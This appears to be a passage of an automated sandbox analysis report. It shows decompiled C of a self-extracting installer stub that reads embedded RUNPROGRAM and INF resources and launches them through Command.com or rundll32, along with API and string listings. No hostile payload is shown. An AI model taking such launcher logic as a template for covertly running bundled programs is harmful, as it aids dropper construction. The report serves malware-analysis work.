                                                                                                                                                                                                      											__eflags =  *0xe79a34 & 0x00000004;
                                                                                                                                                                                                      											if(__eflags == 0) {
                                                                                                                                                                                                      												goto L57;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											_t129 = E00E76495(_t127, _t132, _t157, __eflags);
                                                                                                                                                                                                      											__eflags = _t129;
                                                                                                                                                                                                      											if(_t129 == 0) {
                                                                                                                                                                                                      												_t146 = 0x4c8;
                                                                                                                                                                                                      												E00E744B9(0, 0x4c8, "advpack.dll", 0, 0x10, 0);
                                                                                                                                                                                                      												L65:
                                                                                                                                                                                                      												LocalFree(_v408);
                                                                                                                                                                                                      												 *0xe79124 = E00E76285();
                                                                                                                                                                                                      												goto L62;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											_t146 = GetProcAddress(_t129, "DoInfInstall");
                                                                                                                                                                                                      											_v404 = _t146;
                                                                                                                                                                                                      											__eflags = _t146;
                                                                                                                                                                                                      											if(_t146 == 0) {
                                                                                                                                                                                                      												_t146 = 0x4c9;
                                                                                                                                                                                                      												__eflags = 0;
                                                                                                                                                                                                      												E00E744B9(0, 0x4c9, "DoInfInstall", 0, 0x10, 0);
                                                                                                                                                                                                      												FreeLibrary(_t129);
                                                                                                                                                                                                      												goto L65;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											__eflags =  *0xe78a30;
                                                                                                                                                                                                      											_t151 = _v408;
                                                                                                                                                                                                      											_v384 = 0;
                                                                                                                                                                                                      											_v368 =  &_v280;
                                                                                                                                                                                                      											_t96 =  *0xe79a40; // 0x3
                                                                                                                                                                                                      											_v364 = _t96;
                                                                                                                                                                                                      											_t97 =  *0xe78a38 & 0x0000ffff;
                                                                                                                                                                                                      											_v380 = 0xe79154;
                                                                                                                                                                                                      											_v376 = _t151;
                                                                                                                                                                                                      											_v372 = 0xe791e4;
                                                                                                                                                                                                      											_v360 = _t97;
                                                                                                                                                                                                      											if( *0xe78a30 != 0) {
                                                                                                                                                                                                      												_t97 = _t97 | 0x00010000;
                                                                                                                                                                                                      												__eflags = _t97;
                                                                                                                                                                                                      												_v360 = _t97;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											_t144 =  *0xe79a34; // 0x1
                                                                                                                                                                                                      											__eflags = _t144 & 0x00000008;
                                                                                                                                                                                                      											if((_t144 & 0x00000008) != 0) {
                                                                                                                                                                                                      												_t97 = _t97 | 0x00020000;
                                                                                                                                                                                                      												__eflags = _t97;
                                                                                                                                                                                                      												_v360 = _t97;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											__eflags = _t144 & 0x00000010;
                                                                                                                                                                                                      											if((_t144 & 0x00000010) != 0) {
                                                                                                                                                                                                      												_t97 = _t97 | 0x00040000;
                                                                                                                                                                                                      												__eflags = _t97;
                                                                                                                                                                                                      												_v360 = _t97;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											_t145 =  *0xe78d48; // 0x0
                                                                                                                                                                                                      											__eflags = _t145 & 0x00000040;
                                                                                                                                                                                                      											if((_t145 & 0x00000040) != 0) {
                                                                                                                                                                                                      												_t97 = _t97 | 0x00080000;
                                                                                                                                                                                                      												__eflags = _t97;
                                                                                                                                                                                                      												_v360 = _t97;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											__eflags = _t145;
                                                                                                                                                                                                      											if(_t145 < 0) {
                                                                                                                                                                                                      												_t104 = _t97 | 0x00100000;
                                                                                                                                                                                                      												__eflags = _t104;
                                                                                                                                                                                                      												_v360 = _t104;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											_t98 =  *0xe79a38; // 0x0
                                                                                                                                                                                                      											_v356 = _t98;
                                                                                                                                                                                                      											_t130 = _t146;
                                                                                                                                                                                                      											 *0xe7a288( &_v384);
                                                                                                                                                                                                      											_t101 = _v404();
                                                                                                                                                                                                      											__eflags = _t164 - _t164;
                                                                                                                                                                                                      											if(_t164 != _t164) {
                                                                                                                                                                                                      												_t130 = 4;
                                                                                                                                                                                                      												asm("int 0x29");
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      											 *0xe79124 = _t101;
                                                                                                                                                                                                      											_push(_t129);
                                                                                                                                                                                                      											__eflags = _t101;
                                                                                                                                                                                                      											if(_t101 < 0) {
                                                                                                                                                                                                      												FreeLibrary();
                                                                                                                                                                                                      												goto L61;
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												FreeLibrary();
                                                                                                                                                                                                      												_t127 = _v400;
                                                                                                                                                                                                      												goto L58;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										__eflags =  *0xe79a40 - 1; // 0x3
                                                                                                                                                                                                      										if(__eflags == 0) {
                                                                                                                                                                                                      											goto L37;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										__eflags =  *0xe78a20;
                                                                                                                                                                                                      										if( *0xe78a20 == 0) {
                                                                                                                                                                                                      											goto L37;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										__eflags = _t157;
                                                                                                                                                                                                      										if(_t157 != 0) {
                                                                                                                                                                                                      											goto L38;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      										_v388 = 1;
                                                                                                                                                                                                      										E00E7202A(_t146); // executed
                                                                                                                                                                                                      										goto L37;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t146 =  &_v280;
                                                                                                                                                                                                      									_t108 = E00E7468F("POSTRUNPROGRAM",  &_v280, 0x104);
                                                                                                                                                                                                      									__eflags = _t108;
                                                                                                                                                                                                      									if(_t108 == 0) {
                                                                                                                                                                                                      										goto L25;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									__eflags =  *0xe78c42;
                                                                                                                                                                                                      									if( *0xe78c42 != 0) {
                                                                                                                                                                                                      										goto L69;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t112 = CompareStringA(0x7f, 1,  &_v280, 0xffffffff, "<None>", 0xffffffff);
                                                                                                                                                                                                      									__eflags = _t112 == 0;
                                                                                                                                                                                                      									if(_t112 == 0) {
                                                                                                                                                                                                      										goto L69;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									goto L31;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t118 =  *0xe78a38; // 0x0
                                                                                                                                                                                                      								if(_t118 == 0) {
                                                                                                                                                                                                      									L23:
                                                                                                                                                                                                      									if(_t153 != 0) {
                                                                                                                                                                                                      										goto L31;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t146 =  &_v276;
                                                                                                                                                                                                      									if(E00E7468F("RUNPROGRAM",  &_v276, 0x104) != 0) {
                                                                                                                                                                                                      										goto L27;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									goto L25;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								if((_t118 & 0x00000001) == 0) {
                                                                                                                                                                                                      									__eflags = _t118 & 0x00000002;
                                                                                                                                                                                                      									if((_t118 & 0x00000002) == 0) {
                                                                                                                                                                                                      										goto L62;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									_t140 = "USRQCMD";
                                                                                                                                                                                                      									L20:
                                                                                                                                                                                                      									_t146 =  &_v276;
                                                                                                                                                                                                      									if(E00E7468F(_t140,  &_v276, 0x104) == 0) {
                                                                                                                                                                                                      										goto L25;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									if(CompareStringA(0x7f, 1,  &_v276, 0xffffffff, "<None>", 0xffffffff) - 2 != 0xfffffffe) {
                                                                                                                                                                                                      										_t153 = 1;
                                                                                                                                                                                                      										_v388 = 1;
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      									goto L23;
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      								_t140 = "ADMQCMD";
                                                                                                                                                                                                      								goto L20;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						L26:
                                                                                                                                                                                                      						_push(_t130);
                                                                                                                                                                                                      						_t146 = 0x104;
                                                                                                                                                                                                      						E00E71781( &_v276, 0x104, _t130, 0xe78c42);
                                                                                                                                                                                                      						goto L27;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t130 = "REBOOT";
                                                                                                                                                                                                      				_t125 = E00E7468F(_t130, 0xe79a2c, 4);
                                                                                                                                                                                                      				if(_t125 == 0 || _t125 > 4) {
                                                                                                                                                                                                      					goto L25;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					goto L3;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}





























































                                                                                                                                                                                                      0x00e73e19
                                                                                                                                                                                                      0x00e73f94
                                                                                                                                                                                                      0x00e73fa4
                                                                                                                                                                                                      0x00e73f7c
                                                                                                                                                                                                      0x00e73f80
                                                                                                                                                                                                      0x00e73f8b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73f8b
                                                                                                                                                                                                      0x00e73e2c
                                                                                                                                                                                                      0x00e73e30
                                                                                                                                                                                                      0x00e73e34
                                                                                                                                                                                                      0x00e73e36
                                                                                                                                                                                                      0x00e73f69
                                                                                                                                                                                                      0x00e73f6e
                                                                                                                                                                                                      0x00e73f70
                                                                                                                                                                                                      0x00e73f76
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73f76
                                                                                                                                                                                                      0x00e73e3c
                                                                                                                                                                                                      0x00e73e43
                                                                                                                                                                                                      0x00e73e47
                                                                                                                                                                                                      0x00e73e52
                                                                                                                                                                                                      0x00e73e56
                                                                                                                                                                                                      0x00e73e5c
                                                                                                                                                                                                      0x00e73e61
                                                                                                                                                                                                      0x00e73e68
                                                                                                                                                                                                      0x00e73e70
                                                                                                                                                                                                      0x00e73e74
                                                                                                                                                                                                      0x00e73e7c
                                                                                                                                                                                                      0x00e73e80
                                                                                                                                                                                                      0x00e73e82
                                                                                                                                                                                                      0x00e73e82
                                                                                                                                                                                                      0x00e73e87
                                                                                                                                                                                                      0x00e73e87
                                                                                                                                                                                                      0x00e73e8b
                                                                                                                                                                                                      0x00e73e91
                                                                                                                                                                                                      0x00e73e94
                                                                                                                                                                                                      0x00e73e96
                                                                                                                                                                                                      0x00e73e96
                                                                                                                                                                                                      0x00e73e9b
                                                                                                                                                                                                      0x00e73e9b
                                                                                                                                                                                                      0x00e73e9f
                                                                                                                                                                                                      0x00e73ea2
                                                                                                                                                                                                      0x00e73ea4
                                                                                                                                                                                                      0x00e73ea4
                                                                                                                                                                                                      0x00e73ea9
                                                                                                                                                                                                      0x00e73ea9
                                                                                                                                                                                                      0x00e73ead
                                                                                                                                                                                                      0x00e73eb3
                                                                                                                                                                                                      0x00e73eb6
                                                                                                                                                                                                      0x00e73eb8
                                                                                                                                                                                                      0x00e73eb8
                                                                                                                                                                                                      0x00e73ebd
                                                                                                                                                                                                      0x00e73ebd
                                                                                                                                                                                                      0x00e73ec1
                                                                                                                                                                                                      0x00e73ec3
                                                                                                                                                                                                      0x00e73ec5
                                                                                                                                                                                                      0x00e73ec5
                                                                                                                                                                                                      0x00e73eca
                                                                                                                                                                                                      0x00e73eca
                                                                                                                                                                                                      0x00e73ece
                                                                                                                                                                                                      0x00e73ed5
                                                                                                                                                                                                      0x00e73ed9
                                                                                                                                                                                                      0x00e73ee0
                                                                                                                                                                                                      0x00e73ee6
                                                                                                                                                                                                      0x00e73eea
                                                                                                                                                                                                      0x00e73eec
                                                                                                                                                                                                      0x00e73eee
                                                                                                                                                                                                      0x00e73ef3
                                                                                                                                                                                                      0x00e73ef3
                                                                                                                                                                                                      0x00e73ef5
                                                                                                                                                                                                      0x00e73efa
                                                                                                                                                                                                      0x00e73efb
                                                                                                                                                                                                      0x00e73efd
                                                                                                                                                                                                      0x00e73f40
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73eff
                                                                                                                                                                                                      0x00e73eff
                                                                                                                                                                                                      0x00e73f05
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73f05
                                                                                                                                                                                                      0x00e73efd
                                                                                                                                                                                                      0x00e73dc7
                                                                                                                                                                                                      0x00e73dce
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73dd0
                                                                                                                                                                                                      0x00e73dd7
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73dd9
                                                                                                                                                                                                      0x00e73ddb
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73ddd
                                                                                                                                                                                                      0x00e73de1
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73de1
                                                                                                                                                                                                      0x00e73d59
                                                                                                                                                                                                      0x00e73d65
                                                                                                                                                                                                      0x00e73d6a
                                                                                                                                                                                                      0x00e73d6c
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73d6e
                                                                                                                                                                                                      0x00e73d75
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73d8f
                                                                                                                                                                                                      0x00e73d96
                                                                                                                                                                                                      0x00e73d98
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73d98
                                                                                                                                                                                                      0x00e73c8f
                                                                                                                                                                                                      0x00e73c98
                                                                                                                                                                                                      0x00e73cf1
                                                                                                                                                                                                      0x00e73cf3
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73cfe
                                                                                                                                                                                                      0x00e73d11
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73d11
                                                                                                                                                                                                      0x00e73c9c
                                                                                                                                                                                                      0x00e73ca5
                                                                                                                                                                                                      0x00e73ca7
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00e73cad
                                                                                                                                                                                                      0x00e73cb2

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • memset.MSVCRT ref: 00E73C11
                                                                                                                                                                                                      • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,00000004), ref: 00E73CDC
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E746A0
                                                                                                                                                                                                        • Part of subcall function 00E7468F: SizeofResource.KERNEL32(00000000,00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746A9
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00E746C3
                                                                                                                                                                                                        • Part of subcall function 00E7468F: LoadResource.KERNEL32(00000000,00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746CC
                                                                                                                                                                                                        • Part of subcall function 00E7468F: LockResource.KERNEL32(00000000,?,00E72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746D3
                                                                                                                                                                                                        • Part of subcall function 00E7468F: memcpy_s.MSVCRT ref: 00E746E5
                                                                                                                                                                                                        • Part of subcall function 00E7468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00E746EF
                                                                                                                                                                                                      • CompareStringA.KERNEL32(0000007F,00000001,?,000000FF,<None>,000000FF,00000104,?,00E78C42), ref: 00E73D8F
                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,DoInfInstall), ref: 00E73E26
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00E78C42), ref: 00E73EFF
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,00E78C42), ref: 00E73F1F
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,?,00E78C42), ref: 00E73F40
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,?,?,00E78C42), ref: 00E73F47
                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,DoInfInstall,00000000,00000010,00000000,?,00E78C42), ref: 00E73F76
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,advpack.dll,00000000,00000010,00000000,?,?,?,00E78C42), ref: 00E73F80
                                                                                                                                                                                                      • LocalFree.KERNEL32(?,00000000,00000000,00000010,00000000,?,?,?,00E78C42), ref: 00E73FC2
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Free$Resource$Local$Library$CompareFindString$AddressLoadLockProcSizeofmemcpy_smemset
                                                                                                                                                                                                      • String ID: <None>$ADMQCMD$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$D$DoInfInstall$POSTRUNPROGRAM$REBOOT$RUNPROGRAM$SHOWWINDOW$USRQCMD$advpack.dll$cent
                                                                                                                                                                                                      • API String ID: 1032054927-3575165364
                                                                                                                                                                                                      • Opcode ID: 0df38305e6155e7502653e06b27b9e2aabd50920f0e0d5d8e79dd0fa2c4ecf6a
                                                                                                                                                                                                      • Instruction ID: 780b77d96eff8d663fcf700744c6b5c7a2ea4928dde76e5a019560473b3163f8
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0df38305e6155e7502653e06b27b9e2aabd50920f0e0d5d8e79dd0fa2c4ecf6a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 54B1F3706083419FD3B4DF358845BAB76E4EB84744F10A92EFA8DF21E1DB708989E752
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 82%
                                                                                                                                                                                                      			E00E71AE8(long __ecx, CHAR** _a4, int* _a8) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				char _v527;
                                                                                                                                                                                                      				char _v528;
                                                                                                                                                                                                      				char _v1552;
                                                                                                                                                                                                      				CHAR* _v1556;
                                                                                                                                                                                                      				int* _v1560;
                                                                                                                                                                                                      				CHAR** _v1564;
                                                                                                                                                                                                      				void* __ebx;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t48;
                                                                                                                                                                                                      				CHAR* _t53;
                                                                                                                                                                                                      				CHAR* _t54;
                                                                                                                                                                                                      				char* _t57;
                                                                                                                                                                                                      				char* _t58;
                                                                                                                                                                                                      				CHAR* _t60;
                                                                                                                                                                                                      				void* _t62;
                                                                                                                                                                                                      				signed char _t65;
                                                                                                                                                                                                      				intOrPtr _t76;
                                                                                                                                                                                                      				intOrPtr _t77;
                                                                                                                                                                                                      				unsigned int _t85;
                                                                                                                                                                                                      				CHAR* _t90;
                                                                                                                                                                                                      				CHAR* _t92;
                                                                                                                                                                                                      				char _t105;
                                                                                                                                                                                                      				char _t106;
                                                                                                                                                                                                      				CHAR** _t111;
                                                                                                                                                                                                      				CHAR* _t115;
                                                                                                                                                                                                      				intOrPtr* _t125;
                                                                                                                                                                                                      				void* _t126;
                                                                                                                                                                                                      				CHAR* _t132;
                                                                                                                                                                                                      				CHAR* _t135;
                                                                                                                                                                                                      				void* _t138;
                                                                                                                                                                                                      				void* _t139;
                                                                                                                                                                                                      				void* _t145;
                                                                                                                                                                                                      				intOrPtr* _t146;
                                                                                                                                                                                                      				char* _t148;
                                                                                                                                                                                                      				CHAR* _t151;
                                                                                                                                                                                                      				void* _t152;
                                                                                                                                                                                                      				CHAR* _t155;
                                                                                                                                                                                                      				CHAR* _t156;
                                                                                                                                                                                                      				void* _t157;
                                                                                                                                                                                                      				signed int _t158;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t48 =  *0xe78004; // 0xd47724e2
                                                                                                                                                                                                      				_v8 = _t48 ^ _t158;
                                                                                                                                                                                                      				_t108 = __ecx;
                                                                                                                                                                                                      				_v1564 = _a4;
                                                                                                                                                                                                      				_v1560 = _a8;
                                                                                                                                                                                                      				E00E71680( &_v528, 0x104, __ecx);
                                                                                                                                                                                                      				if(_v528 != 0x22) {
                                                                                                                                                                                                      					_t135 = " ";
                                                                                                                                                                                                      					_t53 =  &_v528;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t135 = "\"";
                                                                                                                                                                                                      					_t53 =  &_v527;
                                                                                                                                                                                                      				}
				_t111 =  &_v1556;
				_v1556 = _t53;
				_t54 = E00E71A84(_t111, _t135);
				_t156 = _v1556;
				_t151 = _t54;
				if(_t156 == 0) {
					L12:
					_push(_t111);
					E00E71781( &_v268, 0x104, _t111, "C:\Users\alfons\AppData\Local\Temp\IXP000.TMP\");
					E00E7658A( &_v268, 0x104, _t156);
					goto L13;
				} else {
					_t132 = _t156;
					_t148 =  &(_t132[1]);
					do {
						_t105 =  *_t132;
						_t132 =  &(_t132[1]);
					} while (_t105 != 0);
					_t111 = _t132 - _t148;
					if(_t111 < 3) {
						goto L12;
					}
					_t106 = _t156[1];
					if(_t106 != 0x3a || _t156[2] != 0x5c) {
						if( *_t156 != 0x5c || _t106 != 0x5c) {
							goto L12;
						} else {
							goto L11;
						}
					} else {
						L11:
						E00E71680( &_v268, 0x104, _t156);
						L13:
						_t138 = 0x2e;
						_t57 = E00E766C8(_t156, _t138);
						if(_t57 == 0 || CompareStringA(0x7f, 1, _t57, 0xffffffff, ".INF", 0xffffffff) != 0) {
							_t139 = 0x2e;
							_t115 = _t156;
							_t58 = E00E766C8(_t115, _t139);
							if(_t58 == 0 || CompareStringA(0x7f, 1, _t58, 0xffffffff, ".BAT", 0xffffffff) != 0) {
								_t156 = LocalAlloc(0x40, 0x400);
								if(_t156 == 0) {
									goto L43;
								}
								_t65 = GetFileAttributesA( &_v268); // executed
								if(_t65 == 0xffffffff || (_t65 & 0x00000010) != 0) {
									E00E71680( &_v1552, 0x400, _t108);
								} else {
									_push(_t115);
									_t108 = 0x400;
									E00E71781( &_v1552, 0x400, _t115,  &_v268);
									if(_t151 != 0 &&  *_t151 != 0) {
										E00E716B3( &_v1552, 0x400, " ");
										E00E716B3( &_v1552, 0x400, _t151);
									}
								}
								_t140 = _t156;
								 *_t156 = 0;
								E00E72AAC( &_v1552, _t156, _t156);
								goto L53;
							} else {
								_t108 = "Command.com /c %s";
								_t125 = "Command.com /c %s";
								_t145 = _t125 + 1;
								do {
									_t76 =  *_t125;
									_t125 = _t125 + 1;
								} while (_t76 != 0);
								_t126 = _t125 - _t145;
								_t146 =  &_v268;
								_t157 = _t146 + 1;
								do {
									_t77 =  *_t146;
									_t146 = _t146 + 1;
								} while (_t77 != 0);
								_t140 = _t146 - _t157;
								_t154 = _t126 + 8 + _t146 - _t157;
								_t156 = LocalAlloc(0x40, _t126 + 8 + _t146 - _t157);
								if(_t156 != 0) {
									E00E7171E(_t156, _t154, "Command.com /c %s",  &_v268);
									goto L53;
								}
								goto L43;
							}
						} else {
							_t85 = GetFileAttributesA( &_v268);
							if(_t85 == 0xffffffff || ( !(_t85 >> 4) & 0x00000001) == 0) {
								_t140 = 0x525;
								_push(0);
								_push(0x10);
								_push(0);
								_t60 =  &_v268;
								goto L35;
							} else {
								_t140 = "[";
								_v1556 = _t151;
								_t90 = E00E71A84( &_v1556, "[");
								if(_t90 != 0) {
									if( *_t90 != 0) {
										_v1556 = _t90;
									}
									_t140 = "]";
									E00E71A84( &_v1556, "]");
								}
								_t156 = LocalAlloc(0x40, 0x200);
								if(_t156 == 0) {
									L43:
									_t60 = 0;
									_t140 = 0x4b5;
									_push(0);
									_push(0x10);
									_push(0);
									L35:
									_push(_t60);
									E00E744B9(0, _t140);
									_t62 = 0;
									goto L54;
								} else {
									_t155 = _v1556;
									_t92 = _t155;
									if( *_t155 == 0) {
										_t92 = "DefaultInstall";
									}
									 *0xe79120 = GetPrivateProfileIntA(_t92, "Reboot", 0,  &_v268);
									 *_v1560 = 1;
									if(GetPrivateProfileStringA("Version", "AdvancedINF", 0xe71140, _t156, 8,  &_v268) == 0) {
										 *0xe79a34 =  *0xe79a34 & 0xfffffffb;
										if( *0xe79a40 != 0) {
											_t108 = "setupapi.dll";
										} else {
											_t108 = "setupx.dll";
											GetShortPathNameA( &_v268,  &_v268, 0x104);
										}
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										_push( &_v268);
										_push(_t155);
										E00E7171E(_t156, 0x200, "rundll32.exe %s,InstallHinfSection %s 128 %s", _t108);
									} else {
										 *0xe79a34 =  *0xe79a34 | 0x00000004;
										if( *_t155 == 0) {
											_t155 = "DefaultInstall";
										}
										E00E71680(_t108, 0x104, _t155);
										_t140 = 0x200;
										E00E71680(_t156, 0x200,  &_v268);
									}
									L53:
									_t62 = 1;
									 *_v1564 = _t156;
									L54:
									_pop(_t152);
									return E00E76CE0(_t62, _t108, _v8 ^ _t158, _t140, _t152, _t156);
								}
							}
						}
					}
				}
			}














































                                                                                                                                                                                                      0x00e71ccc
                                                                                                                                                                                                      0x00e71cce
                                                                                                                                                                                                      0x00e71cce
                                                                                                                                                                                                      0x00e71cdb
                                                                                                                                                                                                      0x00e71ce6
                                                                                                                                                                                                      0x00e71cee
                                                                                                                                                                                                      0x00e71cee
                                                                                                                                                                                                      0x00e71e89
                                                                                                                                                                                                      0x00e71e91
                                                                                                                                                                                                      0x00e71e92
                                                                                                                                                                                                      0x00e71e94
                                                                                                                                                                                                      0x00e71e97
                                                                                                                                                                                                      0x00e71ea4
                                                                                                                                                                                                      0x00e71ea4
                                                                                                                                                                                                      0x00e71c61
                                                                                                                                                                                                      0x00e71c07
                                                                                                                                                                                                      0x00e71bd3
                                                                                                                                                                                                      0x00e71b7b

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CompareStringA.KERNEL32(0000007F,00000001,00000000,000000FF,.INF,000000FF,?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00E71BE7
                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00E71BFE
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000200,?,C:\Users\user\AppData\Local\Temp\IXP000.TMP\,?,?,00000000,00000001,00000000), ref: 00E71C57
                                                                                                                                                                                                      • GetPrivateProfileIntA.KERNEL32 ref: 00E71C88
                                                                                                                                                                                                      • GetPrivateProfileStringA.KERNEL32(Version,AdvancedINF,00E71140,00000000,00000008,?), ref: 00E71CB8
                                                                                                                                                                                                      • GetShortPathNameA.KERNEL32 ref: 00E71D1B
                                                                                                                                                                                                        • Part of subcall function 00E744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00E74518
                                                                                                                                                                                                        • Part of subcall function 00E744B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00E74554
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000000.00000002.441119458.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000000.00000002.441106249.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441179412.0000000000E78000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      • Associated: 00000000.00000002.441195158.0000000000E7C000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_e70000_y0EWt2mE9h.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                      • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP000.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                      • API String ID: 383838535-472070384
                                                                                                                                                                                                      • Opcode ID: bb6d5dc567341b04da6dcb0ae10c19bca90e8703b3204fa744c900de7db8bf6c
                                                                                                                                                                                                      • Instruction ID: ba157e6db8b259b1d31b8467613aa648bc1aff40af547933d0f2b054c7aa9e02
                                                                                                                                                                                                      • Opcode Fuzzy Hash: bb6d5dc567341b04da6dcb0ae10c19bca90e8703b3204fa744c900de7db8bf6c
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 42A10670A003149BEB20DB2CCC45BEA77A9DB91314F14E2E5E55DB72C1DBB09E89CB50
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

